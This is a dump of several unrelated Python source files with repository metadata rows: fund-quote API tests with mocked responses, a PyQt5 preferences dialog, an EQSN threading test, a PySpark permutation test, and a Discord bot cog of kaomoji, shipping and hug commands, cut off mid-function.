assert response.status_code == 502
@responses.activate
def test_get_quotes_invalid_page():
setup_get_funds_response()
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged?page=0')
assert response.status_code == 400
@responses.activate
def test_get_quotes_known_name_returns_http200():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[
responses.urlencoded_params_matcher({'page': '1',
'pageSize': '60',
'fundId': '1012',
'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y'),
})
],
status=200
)
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert len(quote_cache) == 1
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
@responses.activate
def test_get_quotes_are_cached():
setup_get_funds_response()
body = {'Data': [
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535882, 'BidRate': 13.535882, 'AskRate': 13.535882,
'RateDate': '/Date(1616284800000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535846, 'BidRate': 13.535846, 'AskRate': 13.535846,
'RateDate': '/Date(1616198400000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
{'FundId': 1012, 'FundLabel': None, 'LastRate': 13.535809, 'BidRate': 13.535809, 'AskRate': 13.535809,
'RateDate': '/Date(1616112000000)/', 'Yield': -0.2612228741355754, 'InsertedBy': None,
'Inserted': '/Date(-62135596800000)/', 'UpdatedBy': None, 'Updated': '/Date(-62135596800000)/'},
],
'Total': 1224, 'AggregateResults': None, 'Errors': None}
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
json=body,
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=200
)
responses.add(
responses.POST,
url='https://secure.brandnewday.nl/service/navvaluesforfund/',
body='error',
headers={'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8'},
match=[responses.urlencoded_params_matcher(
{'page': '1', 'pageSize': '60', 'fundId': '1012', 'startDate': '01-01-2010',
'endDate': date.today().strftime('%d-%m-%Y')})],
status=500
)
assert len(quote_cache) == 0
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert response.json() == [{'Close': 13.535882, 'Date': '2021-03-21T00:00:00'},
{'Close': 13.535846, 'Date': '2021-03-20T00:00:00'},
{'Close': 13.535809, 'Date': '2021-03-19T00:00:00'}]
assert len(quote_cache) == 1
response = client.get(prefix + 'bnd-wereld-indexfonds-c-unhedged')
assert response.status_code == 200
assert quote_cache['1012@1'] == [Quote(Date=datetime(2021, 3, 21, 0, 0, 0), Close=13.535882),
Quote(Date=datetime(2021, 3, 20, 0, 0, 0), Close=13.535846),
Quote(Date=datetime(2021, 3, 19, 0, 0, 0), Close=13.535809)]
| 41.137931 | 110 | 0.607572 |
abb0ccb320d11e326c6450c49171c55c9d867c94 | 5,385 | py | Python | meggie/mainwindow/dialogs/preferencesDialogUi.py | Teekuningas/meggie | 0790559febb990a5487d4f0c92987066632e1d99 | [
"BSD-2-Clause-FreeBSD"
] | 4 | 2020-04-29T08:57:11.000Z | 2021-01-15T21:21:51.000Z | meggie/mainwindow/dialogs/preferencesDialogUi.py | Teekuningas/meggie | 0790559febb990a5487d4f0c92987066632e1d99 | [
"BSD-2-Clause-FreeBSD"
] | 16 | 2019-05-03T10:31:16.000Z | 2021-05-06T14:59:55.000Z | meggie/mainwindow/dialogs/preferencesDialogUi.py | cibr-jyu/meggie | 0790559febb990a5487d4f0c92987066632e1d99 | [
"BSD-2-Clause-FreeBSD"
] | 3 | 2020-12-12T09:57:00.000Z | 2020-12-20T17:12:05.000Z | # -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'preferencesDialogUi.ui'
#
# Created by: PyQt5 UI code generator 5.12.3
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_DialogPreferences(object):
def setupUi(self, DialogPreferences):
DialogPreferences.setObjectName("DialogPreferences")
DialogPreferences.resize(507, 482)
self.gridLayout_3 = QtWidgets.QGridLayout(DialogPreferences)
self.gridLayout_3.setObjectName("gridLayout_3")
self.horizontalLayout_2 = QtWidgets.QHBoxLayout()
self.horizontalLayout_2.setObjectName("horizontalLayout_2")
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.horizontalLayout_2.addItem(spacerItem)
self.pushButtonCancel = QtWidgets.QPushButton(DialogPreferences)
self.pushButtonCancel.setObjectName("pushButtonCancel")
self.horizontalLayout_2.addWidget(self.pushButtonCancel)
self.pushButtonAccept = QtWidgets.QPushButton(DialogPreferences)
self.pushButtonAccept.setObjectName("pushButtonAccept")
self.horizontalLayout_2.addWidget(self.pushButtonAccept)
self.gridLayout_3.addLayout(self.horizontalLayout_2, 5, 0, 1, 1)
self.scrollArea = QtWidgets.QScrollArea(DialogPreferences)
self.scrollArea.setWidgetResizable(True)
self.scrollArea.setObjectName("scrollArea")
self.scrollAreaWidgetContents = QtWidgets.QWidget()
self.scrollAreaWidgetContents.setGeometry(QtCore.QRect(0, 0, 487, 431))
self.scrollAreaWidgetContents.setObjectName("scrollAreaWidgetContents")
self.gridLayout_5 = QtWidgets.QGridLayout(self.scrollAreaWidgetContents)
self.gridLayout_5.setObjectName("gridLayout_5")
self.groupBoxMisc = QtWidgets.QGroupBox(self.scrollAreaWidgetContents)
self.groupBoxMisc.setObjectName("groupBoxMisc")
self.gridLayout_4 = QtWidgets.QGridLayout(self.groupBoxMisc)
self.gridLayout_4.setObjectName("gridLayout_4")
self.checkBoxAutomaticOpenPreviousExperiment = QtWidgets.QCheckBox(self.groupBoxMisc)
self.checkBoxAutomaticOpenPreviousExperiment.setObjectName("checkBoxAutomaticOpenPreviousExperiment")
self.gridLayout_4.addWidget(self.checkBoxAutomaticOpenPreviousExperiment, 0, 0, 1, 1)
self.gridLayout_5.addWidget(self.groupBoxMisc, 2, 0, 1, 1)
spacerItem1 = QtWidgets.QSpacerItem(20, 40, QtWidgets.QSizePolicy.Minimum, QtWidgets.QSizePolicy.Expanding)
self.gridLayout_5.addItem(spacerItem1, 3, 0, 1, 1)
self.groupBoxWorkspace = QtWidgets.QGroupBox(self.scrollAreaWidgetContents)
self.groupBoxWorkspace.setObjectName("groupBoxWorkspace")
self.gridLayout_2 = QtWidgets.QGridLayout(self.groupBoxWorkspace)
self.gridLayout_2.setObjectName("gridLayout_2")
self.LineEditFilePath = QtWidgets.QLineEdit(self.groupBoxWorkspace)
self.LineEditFilePath.setObjectName("LineEditFilePath")
self.gridLayout_2.addWidget(self.LineEditFilePath, 0, 0, 1, 1)
self.ButtonBrowseWorkingDir = QtWidgets.QPushButton(self.groupBoxWorkspace)
self.ButtonBrowseWorkingDir.setObjectName("ButtonBrowseWorkingDir")
self.gridLayout_2.addWidget(self.ButtonBrowseWorkingDir, 0, 1, 1, 1)
self.gridLayout_5.addWidget(self.groupBoxWorkspace, 0, 0, 1, 1)
self.groupBoxPlugins = QtWidgets.QGroupBox(self.scrollAreaWidgetContents)
self.groupBoxPlugins.setObjectName("groupBoxPlugins")
self.formLayout = QtWidgets.QFormLayout(self.groupBoxPlugins)
self.formLayout.setObjectName("formLayout")
self.pushButtonPlugins = QtWidgets.QPushButton(self.groupBoxPlugins)
self.pushButtonPlugins.setObjectName("pushButtonPlugins")
self.formLayout.setWidget(0, QtWidgets.QFormLayout.SpanningRole, self.pushButtonPlugins)
self.gridLayout_5.addWidget(self.groupBoxPlugins, 1, 0, 1, 1)
self.scrollArea.setWidget(self.scrollAreaWidgetContents)
self.gridLayout_3.addWidget(self.scrollArea, 0, 0, 1, 1)
self.retranslateUi(DialogPreferences)
self.pushButtonCancel.clicked.connect(DialogPreferences.reject)
self.pushButtonAccept.clicked.connect(DialogPreferences.accept)
QtCore.QMetaObject.connectSlotsByName(DialogPreferences)
def retranslateUi(self, DialogPreferences):
_translate = QtCore.QCoreApplication.translate
DialogPreferences.setWindowTitle(_translate("DialogPreferences", "Meggie - Preferences"))
self.pushButtonCancel.setText(_translate("DialogPreferences", "Cancel"))
self.pushButtonAccept.setText(_translate("DialogPreferences", "Ok"))
self.groupBoxMisc.setTitle(_translate("DialogPreferences", "Miscellaneous:"))
self.checkBoxAutomaticOpenPreviousExperiment.setText(_translate("DialogPreferences", "Automatically open previous experiment upon application startup"))
self.groupBoxWorkspace.setTitle(_translate("DialogPreferences", "Workspace:"))
self.ButtonBrowseWorkingDir.setText(_translate("DialogPreferences", "Browse..."))
self.groupBoxPlugins.setTitle(_translate("DialogPreferences", "Plugins:"))
self.pushButtonPlugins.setText(_translate("DialogPreferences", "Select active plugins..."))
| 62.616279 | 160 | 0.758774 |
abb2466001716bd862791946936f478b4e0f91ce | 787 | py | Python | tests/test_measuring_from_threads.py | tqsd/EQSN_python | 823a315b1c2f5658cded19d8c97e579ce7285c42 | [
"MIT"
] | 3 | 2020-05-03T15:09:41.000Z | 2021-12-17T11:26:34.000Z | tests/test_measuring_from_threads.py | tqsd/EQSN_python | 823a315b1c2f5658cded19d8c97e579ce7285c42 | [
"MIT"
] | 5 | 2020-03-13T10:03:39.000Z | 2020-07-09T12:56:04.000Z | tests/test_measuring_from_threads.py | tqsd/EQSN_python | 823a315b1c2f5658cded19d8c97e579ce7285c42 | [
"MIT"
] | 1 | 2020-05-03T15:06:24.000Z | 2020-05-03T15:06:24.000Z | import threading
import random
import time
from eqsn import EQSN
def test_measure_from_threads():
    """Stress test: apply Hadamard gates to entangled qubits from many threads.

    Creates 10 qubits entangled via CNOT from the first, then has one thread
    per qubit apply a random number (10-19) of H gates with small sleeps,
    checking the simulator tolerates concurrent gate application.
    """
    q_sim = EQSN()
    def measure_or_hadamard(_id):
        # Apply 10-19 Hadamard gates, pausing briefly to interleave threads.
        n = random.randrange(10, 20, 1)
        for _ in range(n):
            time.sleep(0.1)
            q_sim.H_gate(_id)
    nr_threads = 10
    ids = [str(x) for x in range(nr_threads)]
    for _id in ids:
        q_sim.new_qubit(_id)
    # Entangle every other qubit with the first one.
    id1 = ids[0]
    for c in ids:
        if c != id1:
            q_sim.cnot_gate(id1, c)
    # One worker thread per qubit.
    thread_list = []
    for _id in ids:
        t = threading.Thread(target=measure_or_hadamard, args=(_id,))
        t.start()
        thread_list.append(t)
    for t in thread_list:
        t.join()
    # Shut down the simulator backend.
    q_sim.stop_all()
if __name__ == "__main__":
test_measure_from_threads()
exit(0)
| 19.195122 | 69 | 0.584498 |
abb2d80690576788c51726bbb153b052e20309fe | 1,464 | py | Python | _tests/test_permute_columns.py | allisonCYWu/utility_functions | d2c6246c96b9cd5e8c01292dd38ab0d572971698 | [
"Apache-2.0"
] | null | null | null | _tests/test_permute_columns.py | allisonCYWu/utility_functions | d2c6246c96b9cd5e8c01292dd38ab0d572971698 | [
"Apache-2.0"
] | 4 | 2019-11-18T13:24:08.000Z | 2020-02-05T19:49:59.000Z | _tests/test_permute_columns.py | allisonCYWu/utility_functions | d2c6246c96b9cd5e8c01292dd38ab0d572971698 | [
"Apache-2.0"
] | null | null | null | import unittest
from unittest import TestCase
from utility_functions.stats_functions import permute_columns
from utility_functions.databricks_uf import has_column
from connect2Databricks.spark_init import spark_init
if 'spark' not in locals():
spark, sqlContext, setting = spark_init()
sc = spark.sparkContext
class TestPermuteColumns(TestCase):
    """Checks that permute_columns shuffles whole columns together."""
    def test_permute_columns(self):
        # Build a tiny frame where col1 and col2 hold identical values, so
        # a joint (non-independent) permutation must keep them identical.
        source_df = spark.createDataFrame(
            [(1, 'a', 'a'),
             (2, 'b', 'b'),
             (3, 'c', 'c'),
             (4, 'd', 'd'),
             (5, 'e', 'e')],
            ['id', 'col1', 'col2'])
        permuted = permute_columns(source_df,
                                   columns_to_permute = ['col1', 'col2'],
                                   column_to_order = 'id',
                                   ind_permute = False)
        permuted.show()
        self.assertTrue(has_column(permuted, 'rand_id'))
        self.assertTrue(has_column(permuted, 'rand_col1'))
        self.assertTrue(has_column(permuted, 'rand_col2'))
        # Joint permutation: the two shuffled columns stay in lockstep...
        self.assertEqual(permuted.select('rand_col1').collect(),
                         permuted.select('rand_col2').collect())
        # ...but the shuffled column differs from the original order.
        self.assertNotEqual(permuted.select('col1').collect(),
                            permuted.select('rand_col1').collect())
if __name__ == '__main__':
    # Allow running the suite directly: `python test_permute_columns.py`.
    unittest.main()
| 40.666667 | 114 | 0.555328 |
abb442950c4d7f407a450c76baca3bbbde03c64f | 24,857 | py | Python | cogs/fun.py | ZetDude/KalevBot | fcf8c1502d3d9c85917ca151f9fb2cf4f3713086 | [
"MIT"
] | 3 | 2017-10-28T21:07:58.000Z | 2018-05-05T12:14:05.000Z | cogs/fun.py | ZetDude/KalevBot | fcf8c1502d3d9c85917ca151f9fb2cf4f3713086 | [
"MIT"
] | 4 | 2017-09-08T17:44:31.000Z | 2017-10-09T15:10:23.000Z | cogs/fun.py | ZetDude/KalevBot | fcf8c1502d3d9c85917ca151f9fb2cf4f3713086 | [
"MIT"
] | 4 | 2017-09-03T15:37:47.000Z | 2017-11-15T20:15:59.000Z | """Fun commands that don't do anything really productive
night, thank, shipname, shipcount, ship, hug, pecan, fortune"""
# -*- coding: utf-8 -*-
import pickle
import random
import sqlite3 as lite
import subprocess
import discord
from discord.ext import commands
from lib import shipname_module as improved_shipname, customconverter as cconv, obot
def search(values, search_for):
    """Find all entries of dict `values` whose key contains `search_for`.

    Both the key and the needle are compared as strings, so any key or
    needle type works.  Returns a list of ``[key, str(value)]`` pairs;
    the value is stringified to preserve the historical interface.
    """
    # Convert the needle once instead of on every iteration; stringify
    # values only for matching keys (the old loop converted every value).
    needle = str(search_for)
    return [[key, str(value)]
            for key, value in values.items()
            if needle in str(key)]
def remove_duplicates(values):
    """Return a copy of `values` with duplicates removed.

    Order is preserved; only the first occurrence of each item is kept.
    Items must be hashable.
    """
    seen = set()
    unique = []
    for item in values:
        if item not in seen:
            seen.add(item)
            unique.append(item)
    return unique
class FunCog():
    """Collection of non-productive "fun" commands (kaomoji, ships, hugs...)."""
    def __init__(self, bot):
        self.bot = bot
        # Renames the class object itself; discord.py derives the cog/help
        # category from type(self).__name__, presumably so help shows
        # "Fun" instead of "FunCog" -- TODO confirm.
        type(self).__name__ = "Fun"
@commands.command(name='night', aliases=['n', 'goodnight', 'nacht', 'öö', 'ööd', 'oyasumi',
'\u304a\u3084\u3059\u307f'],
help=(r"Wish someone a good night using a super cute kaomoji! ^_^"),
brief="Wish someone a good night.")
async def night(self, ctx, *, target_user=None):
"""Wish a good night to `target_user`, with a kaomoji emoticon in front.
`target_user` is anything pertaining to the target user or member that
lib.customconverter.HybridConverter can detect.
`target_user` defaults to None and can be left blank.
`target_user` can also be the argument "-list", in which case the bot returns all the
kaomoji emoticons associated with this command.
"""
# Define the list of kaomoji emoticons the bot will be using. Because of discord formatting
# special characters are escaped with a \.
kaomoji = [r"お(^o^)や(^O^)す(^。^)みぃ(^-^)ノ゙",
r" .。.:\*・゚☆Goodヾ(\*´Д`(\*゚ω゚\* )Night☆.。.:\*・゚",
r" – =͟͟͞ (¦3[▓▓])",
r" 。・:\*:・゚★,。・=^∇^\*=,。・:\*:・゚☆",
r"☆~\*.(UωU\*)おやすみぃ…\*~☆",
r"|・ω・`)おやすみぃ♪", ]
selected_kaomoji = random.choice(kaomoji)
if target_user is None: # If the user does not supply a target user...
await ctx.send(f"{selected_kaomoji} Good night!") # Return a generic response.
elif target_user == "-list": # -list flag...
await ctx.send("\n".join(kaomoji)) # Join together all the kaomoji and send them.
else: # If the target user is actually given.
try:
target_user = await cconv.HybridConverter().convert(ctx, target_user)
await ctx.send(f"{selected_kaomoji} Good night, {target_user.name}!")
except commands.BadArgument: # HybridConverter fails...
# Fall back to just using the inputted string with no conversion.
await ctx.send(f"{selected_kaomoji} Good night, {target_user}!")
@commands.command(name='thank', aliases=['thanks', 'arigato', 'arigatou', 'arigatoo',
'merci', 'arigatō', 'danke', 'aitah', 'aitäh',
'\u3042\u308a\u304c\u3068\u3046'],
help=(r"Thank someone using a super cute kaomoji! ^_^"),
brief="Thank someone.")
async def thank(self, ctx, *, target_user=None):
"""Thank `target_user`, with a kaomoji emoticon in front.
`target_user` is anything pertaining to the target user or member that
lib.customconverter.HybridConverter can detect.
`target_user` defaults to None and can be left blank.
`target_user` can also be the argument "-list", in which case the bot returns all the
kaomoji emoticons associated with this command.
"""
# The list of kaomoji emoticons the bot will be using. Because of discord formatting special
# characters are escaped with a \.
kaomoji = [r"♪(・ω・)ノ",
r"(\*ゝω・)ノ",
r"゚・:,。★\(^-^ )♪ありがとう♪( ^-^)/★,。・:・゚",
r"(★^O^★)",
r"☆\*:.。. o(≧▽≦)o .。.:\*☆",
r"(ノ^_^)ノ",
r"(ノ゚▽゚)ノ",
r"(ノ´ヮ´)ノ\*:・゚✧",
r"(\*^3^)/\~☆",
r"<(\_ \_\*)> アリガトォ",
r"ありがとぅございますっっヽ(●´∀\`)人(´∀\`●)ノ",
r"ありがとうございましたm(\*-ω-)m",
r"+。:.゚ヽ(\*´∀)ノ゚.:。+゚ァリガトゥ"
]
selected_kaomoji = random.choice(kaomoji)
if target_user is None: # If the user does not supply a target user.
await ctx.send(f"{selected_kaomoji} Thank you!") # Return a generic response.
elif target_user == "-list": # -list flag
await ctx.send("\n".join(kaomoji)) # Join together all the kaomoji and send them.
else: # If the target user is actually given.
try:
target_user = await cconv.HybridConverter().convert(ctx, target_user)
if target_user == ctx.bot.user: # If the user's target is the bot itself...
# "u2764" is the black heart unicode character
await ctx.send(f"You're welcome, {ctx.author.name}! \\\u2764")
elif target_user == ctx.author: # If the user attempts to thank themself... sass.
await ctx.send(f"Why would I need to thank you, {ctx.author.name}?")
else: # If no special cases were found...
await ctx.send(f"{selected_kaomoji} Thank you, {target_user.name}!")
except commands.BadArgument: # HybridConverter fails...
# Fall back to just using the inputted string with no conversion
await ctx.send(f"{selected_kaomoji} Thank you, {target_user}!")
@commands.command(name='shipname', aliases=['name'],
help="Create the shipname of two people.")
async def shipname(self, ctx, name1, name2):
"""Uses pecan's shipname module to create the shipname of two names.
`name1` is the first name.
`name2` is the first name.
"""
# Request a shipname from pecan's shipname module™ using names from arguments.
names_shipname = improved_shipname.shipname(name1, name2) # I don't know how it works.
await ctx.send(f"{ctx.author.name}, I shall call it \"**{names_shipname}**\"!")
@commands.command(name='shipcount', aliases=['count'],
help="Get amount of ships created between people",
usage="[users...] OR -top")
async def shipcount(self, ctx, *ships_in):
"""Show all the people someone has been shipped with when given one person, or the amount
of ships between certain people when given multiple.
`ships_in` is the people/person to get info of.
`ships_in` can also be the argument "-top", in which case only the top 10 most shipped pairs
will be shown."""
shipfile = obot.SHIPFILE # File where all shipping information is stored.
ships = [] # This list will contain the user(s) we want to get information about.
for i in ships_in: # Convert all the given member to actual users.
if i == "-top": # skip the -top flag.
continue
ships.append(await cconv.HybridConverter().convert(ctx, i))
ships = remove_duplicates(ships)
# Format the IDs into a format: 'id1:id2:id3...'.
# This format is needed as this is how ship information is stored in the shipfile.
ships_format = ':'.join([str(x.id) for x in ships])
try:
# Open the shipfile and unpickle it. The returning format is a dictionary.
# -> {'id1:id2:id3...': count}
with open(shipfile, "rb") as opened_file:
lines = pickle.load(opened_file)
except FileNotFoundError:
await ctx.send(f"I couldn't find the shipping file ({shipfile})")
return
except pickle.UnpicklingError:
await ctx.send("Shipping data file is corrupt, cannot fetch data.")
return
if not ships: # No arguments... default to author.
ships = [ctx.author]
if len(ships) == 1: # Find all the ships that user is contained in.
return_message = ""
if "-top" in ships_in: # -top flag is given...
# The data dict is turned into a list, and is sorted by the count, then reversed
# so that the biggest are in the beginning, and then only the first 10 are fetched.
mentions = list(reversed(sorted(list(lines.items()), key=lambda a: a[1])))[:10]
else: # no flag is given...
# All the lines that contain the target are fetched
mentions = search(lines, ships[0].id)
mentions = reversed(sorted(mentions, key=lambda a: a[1]))
for k, j in mentions: # Iterate through all fetched lines.
usern = []
# take the 'id1:id2:id3...' format and split it into the IDs it is composed from.
for i in k.split(":"):
try:
# Convert the ID which is stored into an user.
found_user = ctx.bot.get_user(int(i))
if found_user is None: # No server shared with target user.
# NOTE: The function get_user_info() works regardless of the target
# sharing servers with the bot, however, it is terribly slow.
found_user = await ctx.bot.get_user_info(i)
usern.append(found_user.name)
except discord.NotFound: # User doesn't exist on discord...?
usern.append(i) # Fall back to just showing the ID
times_message = "time" if j == 1 else "times"
return_message += f"{' x '.join(usern)}: shipped {j} {times_message}\n"
# example -> "User1 x User2: shipped 3 times"
if not return_message: # no results found...
return_message = (f"{ships[0].name}, you haven't been shipped with anybody yet, "
f"but I still love you!")
await ctx.send(f"```\n{return_message}\n```")
return
else: # The user gives multple users as arguments...
# Find how many times those specific users have been shipped before.
occ = lines.get(ships_format, 0)
times_message = "time" if j == 1 else "times"
await ctx.send(f"{ctx.author}, they have been shipped {occ} {times_message} before")
    @commands.command(name='ship', aliases=['otp'],
                      help="Ship someone with someone else.",
                      brief="Ship someone with someone else. uwu")
    async def ship(self, ctx, *ships: cconv.HybridConverter):
        """Ship the given users together and bump their stored counter.

        Requires at least two distinct users (not including the author);
        with exactly two, also announces a generated ship name.
        """
        shipfile = obot.SHIPFILE  # File where all the shipping information is stored.
        if ctx.message.author in ships:  # User attempts to ship themself.
            await ctx.send((f"{ctx.message.author.name}, "
                            "I don't think you can ship yourself with someone"))
            return
        ships = remove_duplicates(ships)
        if len(ships) < 2:
            await ctx.send(f"{ctx.message.author.name}, mention at least two people in the message")
            return
        ships_names = [x.name for x in ships]
        # Format the IDs into a format: 'id1:id2:id3...'.
        # This format is needed as this is how ship information is stored in the shipfile.
        # The list is sorted by ID for consistency between runs.
        ships_format = ":".join(sorted([str(x.id) for x in ships], key=int))
        try:
            with open(shipfile, "rb") as opened_file:
                # Open the shipfile and unpickle it. The returning format is a dictionary.
                # -> {'id1:id2:id3...': count}
                lines = pickle.loads(opened_file.read())
        except FileNotFoundError:
            lines = {}
            with open(shipfile, 'w'):
                await ctx.send("Created new ship file")
        except pickle.UnpicklingError:
            await ctx.send("Ship file is corrupt, cannot fetch data.")
            return
        occ = lines.get(ships_format, 0)  # Times the target users have already been shipped.
        times_message = "time" + ("" if occ == 1 else "s")
        lines[ships_format] = occ + 1  # Increase count by one.
        with open(shipfile, 'wb') as opened_file:  # Write the new data.
            pickle.dump(lines, opened_file)
        shipname = ""
        if len(ships) == 2:  # If there are two names, we can make a shipname.
            # Request a shipname from pecan's shipname module™
            final = improved_shipname.shipname(*ships_names)
            shipname = "I shall call it \"**" + final + "**\""
        await ctx.send((f"{ctx.message.author.name} totally ships {' and '.join(ships_names)}"
                        f"\nThey have been shipped {occ} {times_message} before"
                        f"\n{shipname}"))
@commands.command(name='hug', aliases=['\U0001f917'],
help="Give someone a hug!")
async def hug(self, ctx, *target_users):
"""Hug target user, and count how many times you have hugged people in total
TODO: Make hugs server-based
`target_users` are the users to hug (or just 1 user).
`target_users` can also be the argument "-top <num>", in which case the top <num> people
with the highest amount of hugs given will be returned.
"""
target_users = list(target_users)
con = lite.connect("important/data.db") # Database where hug data is stored
if target_users[0] == "-top": # If the first argument given is the flag -top...
try: # The second argument is how many people to fetch.
fetch_amount = int(target_users[1])
if fetch_amount < 0:
await ctx.send(f"That's less than zero, {ctx.author}.")
except ValueError:
await ctx.send(f"That's not an integer, {ctx.author}.")
return
except IndexError: # If an amount isn't given, default to 5
fetch_amount = 5
with con:
try:
# Order all entries by amount, descending, then get the first `fetch_amount`
cur = con.cursor()
cur.execute("SELECT * FROM Hug ORDER BY Hugs DESC")
rows = cur.fetchall()[:fetch_amount]
combine = f"```\nTOP {fetch_amount} HUGGERS:\n---------\n"
for row in rows:
# Convert the ID to an user.
target_user = ctx.bot.get_user(row[0])
if target_user is None: # No server shared with target.
try:
# NOTE: The function get_user_info() works regardless of the target
# sharing servers with the bot, however, it is terribly slow.
target_user = await ctx.bot.get_user_info(row[0])
except discord.NotFound: # User doesn't exist on Discord.
target_user = None # Give up and default to None.
combine += target_user.name if not None else row[0]
combine += " - " + str(row[1]) + "\n"
combine += "\n```"
except lite.OperationalError as err: # sql error...
if str(err) == "no such table: Hug": # No table exists...
# Create a new one and inform the user
cur.execute("CREATE TABLE Hug(id INT NOT NULL UNIQUE, Hugs INT);")
await ctx.send("No hug data was recorded, created file now.")
else: # If actual users are given.
targets = []
for i in target_users: # Go through all the targets...
try: # and try to convert them using HybridConverter...
converted_member = await cconv.HybridConverter().convert(ctx, i)
except commands.BadArgument: # but if that fails...
converted_member = "*" + i + "*" # default to the string that the user gave.
targets.append(converted_member)
targets = remove_duplicates(targets)
# If the list contains just the author or nobody
if [ctx.author] == targets or not targets:
await ctx.send(f"Who are you going to hug, {ctx.author.name}? Yourself?")
return
if ctx.author in targets: # Remove the user from the list of targets.
targets.remove(ctx.author)
with con:
try: # Get the data of the author from the database
cur = con.cursor()
cur.execute(
"SELECT COALESCE(Hugs, 0) FROM Hug WHERE id = ?", (ctx.author.id, ))
row = cur.fetchone()
hugs = 0 if row is None else row[0]
except lite.OperationalError as err:
if str(err) == "no such table: Hug":
cur.execute(
"CREATE TABLE Hug(id INT NOT NULL UNIQUE, Hugs INT);")
await ctx.send("Created new hugs database table.")
hugs = 0
times_message = "hug" + ("" if hugs == 1 else "s")
# Create a second list which is just a copy of the targets
mentions_without_bot = list(targets)
for user in mentions_without_bot[::1]:
# Need to iterate backwards to not jump over anything when removing.
if isinstance(user, str): # Get rid of everything that isn't an user.
mentions_without_bot.remove(user)
elif user.bot: # Get rid of bots.
mentions_without_bot.remove(user)
hugs += len(mentions_without_bot) # Increase the hug tally of the author.
# Update database.
cur.execute("INSERT OR IGNORE INTO Hug VALUES(?, ?)", (ctx.author.id, hugs))
cur.execute("UPDATE Hug SET Hugs=? WHERE id=?", (hugs, ctx.author.id))
if ctx.bot.user.id in [x.id for x in targets if not isinstance(x, str)]:
# If the bot itself is in the targets list.
if len(targets) > 1: # If other users are hugged alongside it.
# Join all other targets.
recievers_without_self = list(targets)
recievers_without_self.remove(ctx.bot.user)
recievers = " and ".join([x.name if not isinstance(
x, str) else x for x in recievers_without_self])
combine = (f"{ctx.author.name} gave {recievers} a hug, and I hug you back! "
f"\U0001f917 (+{len(mentions_without_bot)}; {hugs} "
f"{times_message} in total)")
else: # Only the bot is hugged.
combine = (f"I hug you back, {ctx.author.name}! "
f"\U0001f917 (+{len(mentions_without_bot)}; {hugs} "
f"{times_message} in total)")
elif targets:
# Join all targets.
recievers = " and ".join(
[x.name if not isinstance(x, str) else x for x in targets])
combine = (f"{ctx.author.name} gave {recievers} a hug! "
f"(+{len(mentions_without_bot)}; {hugs} "
f"{times_message} in total)")
else: # I don't know if this clause if ever executed but I'm too scared to remove it.
combine = (f"{ctx.author.name}, you've hit the else clause on line 381 of fun.py, "
f"please report it to someone.")
await ctx.send(combine)
@commands.command(name='pecan', aliases=['p'],
help="Random quote from pecan.")
async def pecan(self, ctx, *, input_text=None):
"""Get a random or certain line from the old IRC chat logs of pecan.
`input_text` is the integer code of the line to fetch. Lookup is 1-indexed.
`input_text` can also be left empty, in which case it defaults to None and just gives a
random line.
`input_text` can also be a string, in which case that string is searched for in the corpus,
and a random line containing that string is returned.
"""
try:
with open(obot.PECAN_CORPUS, "r") as opened_file:
data = opened_file.read().splitlines() # Get all the lines of the file
if input_text is None: # No argument given
num = random.choice(range(len(data))) # Get a random number.
quote = data[num] # Get the quote corresponding to that number
await ctx.send(f"{num + 1}: `{quote}`")
else: # An argument is given
try: # Test if is the number for a certain line
num = int(input_text)
num = num - 1
if num < 0:
await ctx.send("baka! number is negative!")
return
elif num == 0:
await ctx.send("baka! file is 1-indexed!")
return
quote = data[num]
except IndexError:
await ctx.send(f"baka! number is over {len(data)}!")
return
except ValueError: # Not an int
# Find all entries where target string is included.
if input_text.startswith('"') and input_text.endswith('"'):
input_text = input_text[1:-1]
found_entries = []
for j, i in enumerate(data):
if input_text.lower() in i.lower(): # case-insensitive
